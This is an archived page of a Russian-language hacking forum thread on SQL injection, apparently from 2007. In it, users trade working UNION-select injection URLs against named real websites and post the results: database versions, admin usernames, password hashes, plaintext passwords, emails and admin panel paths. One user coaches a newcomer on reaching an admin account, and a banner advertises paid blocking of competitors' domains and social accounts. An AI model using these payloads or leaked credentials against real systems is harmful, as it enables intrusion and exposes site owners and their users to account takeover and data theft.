УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 382 из 1242

382

Опции темы

Поиск в этой теме

Опции просмотра

#3811

24.11.2007, 18:41

ZAMUT

Members of Antichat - Level 5

Регистрация: 24.10.2007

Сообщений: 256

Провел на форуме:
6905523

Репутация: 1174

www.khemer.com Fun Online Games

Код:

http://www.khemer.com/index.php?action=category&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5+--+

4.1.22-standard:khemer_fuHack@localhost:khemer_khmerdb

Код:

http://www.khemer.com/index.php?action=category&id=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+users+limit+0,1+--+&page=0&ppage=20&order2=game_name&sby=ASC

Всего одна запись, как ни странно админ =) хэш сбручен.

Код:

toby:d85bf20bfaa9f65a051daa8d1c7214af:pehyuen

Авторизоваться тут:

Код:

http://www.khemer.com/login.php

#3812

24.11.2007, 19:24

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

Провел на форуме:
7192869

Репутация: 3033

Код:

http://www.worstpreviews.com/review.php?id=-168+union+select+version(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*

Код:

http://dvd.themanroom.com/dvd-review.php?id=-450+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*

Код:

http://www.fremontcountyinfo.com/review.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat_ws(0x3a,userid,username,password),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+user/*

попробуйте до админа добраться

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

#3813

24.11.2007, 21:03

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

Цитата:

Сообщение от Mike 007

Код:

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*

я в этом деле новичок

для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь?

Поможем Mike 007-му...)

Код:

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,concat_ws(0x3a,id,user,pass,mail),3,4,5+from+login+limit+1,1/*

Админка (зайти на смог)

Код:

http://www.polimernm.ru/admin/index.php

#3814

24.11.2007, 21:41

•••™NO FEAR™•••

Постоянный

Регистрация: 08.08.2005

Сообщений: 782

Провел на форуме:
6573706

Репутация: 1419

Код:

http://www.albarakat.ru/pubs.php?id_pubs=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*

Ищите админку и имена таблиц с колонками.

#3815

24.11.2007, 22:08

Mike 007

Познающий

Регистрация: 04.04.2007

Сообщений: 54

Провел на форуме:
189215

Репутация: 86

5taY3r
спасибо за помощь

#3816

24.11.2007, 22:09

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Код:

http://www.imageland-pharma.ru/news.php?id=-1'+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71),2,3,4,5/*&sdate=2001-07-19&pdate=2007-10-30&i=0&mode=full

4.1.11

Код:

http://www.imageland-pharma.ru/news.php?id=-1'+union+select+concat(id,0x3a,name,0x3a,password,0x3a,email),2,3,4,5+from+users/*&sdate=2001-07-19&pdate=2007-10-30&i=0&mode=full

1:admin:RytGjKKh: попробуйте найти админку

#3817

24.11.2007, 22:40

Mike 007

Познающий

Регистрация: 04.04.2007

Сообщений: 54

Провел на форуме:
189215

Репутация: 86

http://www.macidol.com/review.php?id=-1+union+select+1,user(),database(),4,5,6,7,8,9,10/*

#3818

24.11.2007, 22:54

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Цитата:

Сообщение от Mike 007

http://www.macidol.com/review.php?id=-1+union+select+1,user(),database(),4,5,6,7,8,9,10/*

хэш админа форума

Код:

-1+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10+from+phpbb_users+limit+1,1/*

хэши, где длина колонки с icq равна 6 символам

Код:

-1+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10+from+phpbb_users+where+length(user_icq)=6+limit+1,1/*

Пример: mixedance2002:56e48939372812b306938bc0f4be770a:xan ax@online-drugs.com:442459

#3819

24.11.2007, 23:11

Mike 007

Познающий

Регистрация: 04.04.2007

Сообщений: 54

Провел на форуме:
189215

Репутация: 86

Код:

http://www.iks-navigator.ru/review.php?id=-1+union+select+1,concat(password,0x3a,user)+from+mysql.user/*

7cfc33b574d442f6:root:gfhjkm
вопрос: как залогиниться?/

#3820

25.11.2007, 00:06

Mike 007

Познающий

Регистрация: 04.04.2007

Сообщений: 54

Провел на форуме:
189215

Репутация: 86

http://www.vdumu.net/review.php?id=-1'

http://www.koln.ru/see.php?id=-265+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19/*

Последний раз редактировалось Mike 007; 25.11.2007 в 00:19..

Страница 382 из 1242

382

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход